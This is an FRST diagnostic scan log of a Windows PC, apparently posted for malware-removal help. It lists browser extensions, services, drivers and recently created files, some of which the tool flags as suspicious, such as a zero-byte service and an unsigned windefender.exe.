FF DefaultProfile: twf7p78h.default
FF ProfilePath: C:\Users\TATTOO NR\AppData\Roaming\Mozilla\Firefox\Profiles\twf7p78h.default [2019-06-10]
FF Extension: (Amazon Assistant for Firefox) - C:\Users\TATTOO NR\AppData\Roaming\Mozilla\Firefox\Profiles\twf7p78h.default\Extensions\abb-acer@amazon.com.xpi [2018-12-20] [UpdateUrl:hxxps://s3-us-west-2.amazonaws.com/ubp-ubpextension-us-prod/vendor-update/firefox/acer1/updates.json]
FF Extension: (English (US) Language Pack) - C:\Users\TATTOO NR\AppData\Roaming\Mozilla\Firefox\Profiles\twf7p78h.default\Extensions\langpack-en-US@firefox.mozilla.org.xpi [2018-12-20]
FF Extension: (Mozilla Partner Defaults) - C:\Users\TATTOO NR\AppData\Roaming\Mozilla\Firefox\Profiles\twf7p78h.default\Extensions\partnerdefaults@mozilla.com [2017-12-08] [Legacy]
FF Extension: (Acer Locale Fix) - C:\Users\TATTOO NR\AppData\Roaming\Mozilla\Firefox\Profiles\twf7p78h.default\features\{18ef1d82-648c-481c-9590-2660f6a75788}\acer-locale-fix@mozilla.org.xpi [2018-12-20] [Legacy]
FF Extension: (Amazon Assistant for Firefox) - C:\Program Files (x86)\Mozilla Firefox\distribution\extensions\abb-acer@amazon.com [2017-12-09] [Legacy]
FF Extension: (English (US) Language Pack) - C:\Program Files (x86)\Mozilla Firefox\distribution\extensions\langpack-en-US@firefox.mozilla.org [2017-12-09] [Legacy]
FF Extension: (Mozilla Partner Defaults) - C:\Program Files (x86)\Mozilla Firefox\distribution\extensions\partnerdefaults@mozilla.com [2017-12-09] [Legacy]
FF Plugin: 3ds.com/ComposerPlayerWebPlugin_x86_64 -> C:\PROGRA~1\SOLIDW~1\SOLIDW~3\Bin\NPCOMP~1.DLL [2018-02-26] (Dassault Systemes SE -> Dassault Systemes)
FF Plugin-x32: 3ds.com/ComposerPlayerWebPlugin -> C:\PROGRA~1\SOLIDW~1\SOLIDW~3\Bin\x86\NPCOMP~1.DLL [2018-02-26] (Dassault Systemes SE -> Dassault Systemes)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-04-08] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)

Chrome:
=======
CHR DefaultProfile: Profile 1
CHR Profile: C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default [2019-06-10]
CHR Extension: (Slides) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-12-08]
CHR Extension: (Docs) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-12-08]
CHR Extension: (Google Drive) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-12-08]
CHR Extension: (YouTube) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-12-08]
CHR Extension: (Norton Security Toolbar) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2019-03-11]
CHR Extension: (Sheets) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-12-08]
CHR Extension: (Google Docs Offline) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-23]
CHR Extension: (Norton Identity Safe) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2017-12-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-04-03]
CHR Extension: (Gmail) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-12-08]
CHR Extension: (Chrome Media Router) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-03-11]
CHR Profile: C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Guest Profile [2019-06-10]
CHR Profile: C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-06-10]
CHR Extension: (Slides) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-11-12]
CHR Extension: (Docs) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-11-12]
CHR Extension: (Google Drive) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-11-12]
CHR Extension: (YouTube) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-11-12]
CHR Extension: (Norton Security Toolbar) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2019-04-12]
CHR Extension: (Sheets) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-11-12]
CHR Extension: (Google Docs Offline) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-11-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-11-12]
CHR Extension: (Gmail) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-08]
CHR Extension: (Chrome Media Router) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-05-24]
CHR Profile: C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\System Profile [2019-06-10]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton Security\Engine\22.17.2.46\Exts\Chrome.crx <not found>
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton Security\Engine\22.17.2.46\Exts\Chrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

"tijmjrmm" => service was unlocked. <==== ATTENTION

R2 AMD External Events Utility; C:\WINDOWS\system32\atiesrxx.exe [551800 2017-05-31] (Advanced Micro Devices, Inc. -> AMD)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [338312 2017-04-24] (Qualcomm Atheros -> Windows (R) Win 7 DDK provider)
R2 CCDMonitorService; C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe [2272472 2017-05-17] (Acer Incorporated -> Acer Incorporated)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11145800 2019-05-29] (Microsoft Corporation -> Microsoft Corporation)
S2 Dashlane Upgrade Service; C:\Program Files (x86)\Dashlane\Upgrade\DashlaneUpgradeService.exe [83992 2017-08-23] (Dashlane -> Dashlane, Inc.)
R2 Dolby DAX2 API Service; C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe [194048 2017-04-10] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.)
S3 impi_hydra; C:\Program Files\Common Files\SolidWorks Shared\Simulation Worker Agent\hydra_service.exe [880296 2018-02-26] (Intel(R) Software Development Products -> Intel Corporation)
R2 MediatekRegistryWriter; C:\Program Files (x86)\MediatekWiFi\Common\RaRegistry.exe [401040 2014-07-31] (MEDIATEK INC. -> Mediatek Inc.)
R2 MediatekRegistryWriter64; C:\Program Files (x86)\MediatekWiFi\Common\RaRegistry64.exe [454288 2014-07-31] (MEDIATEK INC. -> Mediatek Inc.)
R2 NortonSecurity; C:\Program Files\Norton Security\Engine\22.17.2.46\NortonSecurity.exe [225608 2019-05-25] (Symantec Corporation -> Symantec Corporation)
R2 nsWscSvc; C:\Program Files\Norton Security\Engine\22.17.2.46\nsWscSvc.exe [933200 2019-05-25] (Symantec Corporation -> Symantec Corporation)
S3 QALSvc; C:\Program Files\Acer\Acer Quick Access\QALSvc.exe [461616 2017-02-15] (Acer Incorporated -> Acer Incorporated)
S3 QASvc; C:\Program Files\Acer\Acer Quick Access\QASvc.exe [506672 2017-02-15] (Acer Incorporated -> Acer Incorporated)
S3 RaMediaServer; C:\Program Files (x86)\MediatekWiFi\Common\RaMediaServer.exe [1863680 2012-07-06] (Ralink) [File not signed]
R2 RemoteSolverDispatcher; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe [264704 2018-02-26] (Mentor Graphics Corporation -> Mentor Graphics Corporation)
R2 RepetierServer; C:\Program Files (x86)\Repetier-Server\bin\RepetierServer.exe [7067496 2018-09-18] (Hot-World GmbH & Co. KG -> )
S3 SolidWorks Licensing Service; C:\Program Files (x86)\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe [79360 2018-10-31] (SolidWorks) [File not signed]
S2 SWVisualize2018.BoostService; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize Boost\SWVisualize.BoostService.exe [59280 2018-02-26] (Dassault Systemes SolidWorks Corp. -> Dassault Systèmes)
S2 SWVisualize2018.Queue.Server; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe [24976 2018-02-26] (Dassault Systemes SolidWorks Corp. -> Dassault Systèmes)
S2 tijmjrmm; C:\WINDOWS\SysWOW64\tijmjrmm\mcibckaj.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
S3 UEIPSvc; C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe [299824 2017-04-28] (Acer Incorporated -> acer)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [4413440 2019-03-14] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [107160 2019-02-16] (Microsoft Corporation -> Microsoft Corporation)
R2 WinDefender; C:\WINDOWS\windefender.exe [1435136 2019-06-10] (Access Denied) [File not signed]
R2 XRNADB2; C:\Program Files (x86)\Xerox Office Printing\Printer SSW2\PrintingScout\xrksmdb.exe [249344 2014-08-27] (Xerox) [File not signed]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 amdgpio2; C:\WINDOWS\System32\drivers\amdgpio2.sys [34704 2016-08-13] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc)
R3 amdi2c; C:\WINDOWS\System32\drivers\amdi2c.sys [54128 2017-05-11] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc)
S3 amdkmcsp; C:\WINDOWS\system32\DRIVERS\amdkmcsp.sys [101232 2017-06-16] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc. )
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0314721.inf_amd64_6e18cebcd5509182\atikmdag.sys [36557176 2017-05-31] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0314721.inf_amd64_6e18cebcd5509182\atikmpag.sys [528760 2017-05-31] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R0 amdpsp; C:\WINDOWS\System32\DRIVERS\amdpsp.sys [243048 2017-06-16] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc. )
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-04-25] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices)
S1 BHDrvx64; C:\Program Files\Norton Security\NortonData\22.9.2.3\Definitions\BASHDefs\20180201.001\BHDrvx64.sys [1880144 2018-01-23] (Symantec Corporation -> Symantec Corporation)
R1 ccSet_NGC; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\ccSetx64.sys [192704 2019-05-25] (Symantec Corporation -> Symantec Corporation)
S3 CH341SER_A64; C:\WINDOWS\System32\Drivers\CH341S64.SYS [59904 2015-02-06] (Microsoft Windows Hardware Compatibility Publisher -> http://www.winchiphead.com)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [507984 2018-01-04] (Symantec Corporation -> Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [152656 2018-01-04] (Symantec Corporation -> Symantec Corporation)
S3 glavcam; C:\WINDOWS\system32\DRIVERS\glavcam.sys [1711104 2018-01-09] (GENESYS LOGIC, INC. -> Windows (R) Codename Longhorn DDK provider)
R1 IDSVia64; C:\Program Files\Norton Security\NortonData\22.9.2.3\Definitions\IPSDefs\20180206.001\IDSvia64.sys [1056920 2017-12-08] (Symantec Corporation -> Symantec Corporation)
R3 LMDriver; C:\WINDOWS\System32\drivers\LMDriver.sys [31000 2018-05-15] (Acer Incorporated -> Acer Incorporated)
R3 Qcamain10x64; C:\WINDOWS\system32\DRIVERS\Qcamain10x64.sys [2412976 2017-04-24] (Qualcomm Atheros -> Qualcomm Atheros, Inc.)
R3 RadioShim; C:\WINDOWS\System32\drivers\RadioShim.sys [25368 2018-05-15] (Acer Incorporated -> Acer Incorporated)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [954368 2017-04-11] (Realtek Semiconductor Corp. -> Realtek )
R3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [782304 2017-04-11] (Realtek Semiconductor Corp. -> Realsil Semiconductor Corporation)
R2 speedfan; C:\WINDOWS\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S3 SRTSP; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\SRTSP64.SYS [864776 2019-05-25] (Symantec Corporation -> Symantec Corporation)
R1 SRTSPX; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\SRTSPX64.SYS [49672 2019-05-25] (Symantec Corporation -> Symantec Corporation)
S3 STTub30; C:\WINDOWS\System32\Drivers\STTub30.sys [44184 2012-07-20] (STMicroelectronics -> STMicroelectronics)
R0 SymEFASI; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\SYMEFASI64.SYS [1998552 2019-05-25] (Symantec Corporation -> Symantec Corporation)
S0 SymELAM; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\SymELAM.sys [25744 2019-05-25] (Microsoft Windows Early Launch Anti-malware Publisher -> Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [100064 2019-04-01] (Symantec Corporation -> Symantec Corporation)
R1 SymIRON; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\Ironx64.SYS [315912 2019-05-25] (Symantec Corporation -> Symantec Corporation)
R1 SymNetS; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\symnets.sys [573448 2019-05-25] (Symantec Corporation -> Symantec Corporation)
R3 umbus; C:\WINDOWS\System32\drivers\umbus.sys [56832 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
R3 vjoy; C:\WINDOWS\System32\drivers\vjoy.sys [57976 2017-03-09] (Shaul Eizikovich -> Shaul Eizikovich)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44616 2018-04-12] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [331680 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [44032 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
S3 wpCtrlDrv_NGC; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\wpCtrlDrv.sys [1012120 2019-05-25] (Symantec Corporation -> Symantec Corporation)
S4 SymEvnt; \??\C:\Program Files\Norton Security\NortonData\22.9.2.3\SymPlatform\SymEvnt.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Three months (created) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-06-10 16:33 - 2019-06-10 16:35 - 000042587 _____ C:\Users\TATTOO NR\Downloads\FRST.txt
2019-06-10 16:33 - 2019-06-10 16:33 - 002418688 _____ (Farbar) C:\Users\TATTOO NR\Downloads\FRST64.exe
2019-06-10 16:02 - 2019-06-10 16:02 - 000000000 ____D C:\WINDOWS\System32\Tasks\Norton Security
2019-06-10 15:54 - 2019-06-10 15:54 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\EpicNet Inc
2019-06-10 15:53 - 2019-06-10 15:53 - 000000000 ____D C:\WINDOWS\SysWOW64\tijmjrmm
2019-06-10 15:48 - 2019-06-10 15:48 - 000003376 _____ C:\WINDOWS\System32\Tasks\Norton WSC Integration
2019-06-10 15:48 - 2019-06-10 15:48 - 000000290 __RSH C:\Users\TATTOO NR\ntuser.pol
2019-06-10 15:48 - 2019-06-10 15:48 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security
2019-06-10 15:31 - 2019-06-10 15:31 - 000002878 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2019-06-10 15:28 - 2019-06-10 16:03 - 000003390 _____ C:\WINDOWS\System32\Tasks\NvNgxUpdateCheckDaily_{A6B397E0-97E0-97E0-97E0-A6B397E097E0}
2019-06-10 15:27 - 2019-06-10 15:27 - 000000000 ____D C:\ProgramData\Pader
2019-06-10 15:27 - 2019-06-10 15:27 - 000000000 ____D C:\ProgramData\{F9EDCDAB-B9A4-DEF1-DCA4-7252DC432B03}
2019-06-10 15:27 - 2019-06-10 15:27 - 000000000 ____D C:\ProgramData\{A55344D9-30D6-824F-AE2D-CC0EAECA955F}
2019-06-10 15:26 - 2019-06-10 15:26 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\4zvrrfvi3jw
2019-06-10 15:26 - 2019-06-10 15:26 - 000000000 ____D C:\Program Files\HIXKNY8VO4
2019-06-10 15:26 - 2019-06-10 15:26 - 000000000 ____D C:\Program Files (x86)\EatPizza
2019-06-10 15:25 - 2019-06-10 15:53 - 001435136 ____H C:\WINDOWS\windefender.exe
2019-06-10 15:25 - 2019-06-10 15:25 - 000000258 __RSH C:\ProgramData\ntuser.pol
2019-06-10 15:24 - 2019-06-10 16:00 - 000003612 _____ C:\WINDOWS\System32\Tasks\ScheduledUpdate
2019-06-10 15:24 - 2019-06-10 16:00 - 000003286 _____ C:\WINDOWS\System32\Tasks\csrss
2019-06-10 15:24 - 2019-06-10 15:47 - 000000414 _____ C:\WINDOWS\Tasks\Updater_Online_Application.job
2019-06-10 15:24 - 2019-06-10 15:47 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G6.job
2019-06-10 15:24 - 2019-06-10 15:47 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G5.job
2019-06-10 15:24 - 2019-06-10 15:47 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G4.job
2019-06-10 15:24 - 2019-06-10 15:47 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G3.job
2019-06-10 15:24 - 2019-06-10 15:47 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G2.job
2019-06-10 15:24 - 2019-06-10 15:47 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G1.job
2019-06-10 15:24 - 2019-06-10 15:24 - 000003308 _____ C:\WINDOWS\System32\Tasks\Updater_Online_Application
2019-06-10 15:24 - 2019-06-10 15:24 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G6
2019-06-10 15:24 - 2019-06-10 15:24 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G5
2019-06-10 15:24 - 2019-06-10 15:24 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G4
2019-06-10 15:24 - 2019-06-10 15:24 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G3
2019-06-10 15:24 - 2019-06-10 15:24 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G2
2019-06-10 15:24 - 2019-06-10 15:24 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G1
2019-06-10 15:24 - 2019-06-10 15:24 - 000000000 ___HD C:\WINDOWS\rss
2019-06-10 15:24 - 2019-06-10 15:24 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\Microleaves
2019-06-10 15:24 - 2019-06-10 15:24 - 000000000 ____D C:\Users\TATTOO NR\AppData\Local\App
2019-06-10 15:24 - 2019-06-10 15:24 - 000000000 ____D C:\Users\TATTOO NR\AppData\Local\AdvinstAnalytics
2019-06-10 15:24 - 2019-06-10 15:24 - 000000000 ____D C:\Program Files (x86)\Microleaves
2019-06-10 15:23 - 2019-06-10 15:23 - 000003576 _____ C:\WINDOWS\System32\Tasks\SVC Update
2019-06-10 15:23 - 2019-06-10 15:23 - 000000000 ____D C:\Program Files (x86)\KMSPico
2019-06-10 15:17 - 2019-06-10 15:51 - 000000000 ____D C:\Users\TATTOO NR\AppData\LocalLow\uTorrent
2019-06-10 15:17 - 2019-06-10 15:17 - 000004608 _____ C:\WINDOWS\SECOH-QAD.exe
2019-06-10 15:17 - 2019-06-10 15:17 - 000003584 _____ C:\WINDOWS\SECOH-QAD.dll
2019-06-10 15:04 - 2019-06-10 15:04 - 000162537 _____ C:\Users\TATTOO NR\Downloads\kupna zmluva auto.pdf
2019-06-10 09:42 - 2019-06-10 09:42 - 000000000 ____D C:\WINDOWS\System32\Tasks\Remediation
2019-06-10 09:40 - 2019-06-10 09:40 - 000002497 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002496 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002460 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002459 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002453 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002447 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002439 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools
2019-06-10 09:34 - 2019-06-10 09:34 - 000000110 ____H C:\Users\TATTOO NR\Desktop\depositphotos_221770690-stock-photo-rose-window-neo-gothic-style.jpg.uid-zps
2019-06-07 10:20 - 2019-06-07 10:20 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Bez cfecgw.png.uid-zps
2019-06-06 12:33 - 2019-06-06 12:33 - 000000110 ____H C:\Users\TATTOO NR\Desktop\stiahnuť.jpgjfrtj.jpg.uid-zps
2019-06-04 14:59 - 2019-06-04 14:59 - 000000110 ____H C:\Users\TATTOO NR\Desktop\59839268_347941759413581_5544069203016810496_n.jpg.uid-zps
2019-06-04 09:01 - 2019-06-04 09:01 - 000000110 ____H C:\Users\TATTOO NR\Desktop\9f42c06c793e3e8a98f330f1ef9fcd76.jpg.uid-zps
2019-06-03 09:07 - 2019-06-03 09:07 - 000000110 ____H C:\Users\TATTOO NR\Desktop\beautiful-bloom-blooming-658687 (1).jpg.uid-zps
2019-06-03 09:03 - 2019-06-03 09:03 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Natural-Rose.jpg.uid-zps
2019-05-31 09:11 - 2019-05-31 09:11 - 000000110 ____H C:\Users\TATTOO NR\Desktop\SRAM_EX1_UH.jpg.uid-zps
2019-05-30 16:26 - 2019-05-30 16:26 - 000000110 ____H C:\Users\TATTOO NR\Desktop\61543348_682086725557581_6099366821796773888_n.jpg.uid-zps
2019-05-30 09:06 - 2019-05-30 09:06 - 000000110 ____H C:\Users\TATTOO NR\Desktop\ffff.jpg.uid-zps
2019-05-27 09:14 - 2019-05-27 09:14 - 000000110 ____H C:\Users\TATTOO NR\Desktop\1_NPl8IDrkOHaILlhr7lLI5Q@2x.jpeg.uid-zps
2019-05-24 09:37 - 2019-05-24 09:37 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Chester-Bennington-Drawing.jpg.uid-zps
2019-05-24 09:37 - 2019-05-24 09:37 - 000000110 ____H C:\Users\TATTOO NR\Desktop\19212-chester-bennington-screaming-hd-wallpaper.jpg.uid-zps
2019-05-23 09:52 - 2019-05-23 09:52 - 000000110 ____H C:\Users\TATTOO NR\Desktop\48368327_211082393154894_908574033384046592_n.jpg.uid-zps
2019-05-21 14:59 - 2019-05-21 14:59 - 000000110 ____H C:\Users\TATTOO NR\Desktop\60158295_706204403153531_1740009122692071424_n.jpg.uid-zps
2019-05-20 09:35 - 2019-05-20 09:35 - 000000110 ____H C:\Users\TATTOO NR\Desktop\opravena ospravdlk – kópia.jpg.uid-zps
2019-05-15 10:05 - 2019-05-03 08:31 - 007519888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2019-05-15 10:05 - 2019-05-03 08:18 - 006569344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2019-05-15 10:05 - 2019-05-03 08:12 - 025855488 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2019-05-15 10:04 - 2019-05-03 14:14 - 000790208 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2019-05-15 10:04 - 2019-05-03 14:13 - 001376472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2019-05-15 10:04 - 2019-05-03 14:13 - 000396088 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2019-05-15 10:04 - 2019-05-03 13:55 - 000123392 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2019-05-15 10:04 - 2019-05-03 13:54 - 000177664 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll
2019-05-15 10:04 - 2019-05-03 13:52 - 000119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll
2019-05-15 10:04 - 2019-05-03 13:51 - 003613696 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2019-05-15 10:04 - 2019-05-03 13:51 - 001364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvruserservice.dll
2019-05-15 10:04 - 2019-05-03 13:50 - 004054528 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2019-05-15 10:04 - 2019-05-03 13:50 - 001663488 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2019-05-15 10:04 - 2019-05-03 13:49 - 001288704 _____ (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll
2019-05-15 10:04 - 2019-05-03 13:49 - 000488448 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2019-05-15 10:04 - 2019-05-03 13:49 - 000210944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWWIN.EXE
2019-05-15 10:04 - 2019-05-03 13:43 - 001027008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2019-05-15 10:04 - 2019-05-03 13:43 - 000662328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2019-05-15 10:04 - 2019-05-03 13:30 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll
2019-05-15 10:04 - 2019-05-03 13:30 - 000098304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2019-05-15 10:04 - 2019-05-03 13:28 - 002882048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
